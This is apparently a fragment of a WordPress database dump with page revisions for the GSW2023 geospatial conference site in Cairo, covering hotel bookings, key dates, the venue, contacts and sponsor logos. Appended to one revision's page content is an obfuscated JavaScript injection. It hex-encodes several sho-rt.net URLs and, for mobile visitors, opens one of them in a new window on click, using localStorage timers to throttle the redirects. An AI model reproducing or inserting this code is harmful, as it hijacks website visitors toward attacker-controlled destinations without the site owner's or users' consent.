src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:53:44','2023-08-16 02:53:44','',3066,'https://gsw2023.com/?p=5270',0,'revision','',0),
(5271,1,'2023-08-16 02:54:09','2023-08-16 02:54:09','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154342078{margin-top: 100px !important;}\"]</p>\n<h3></h3>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" 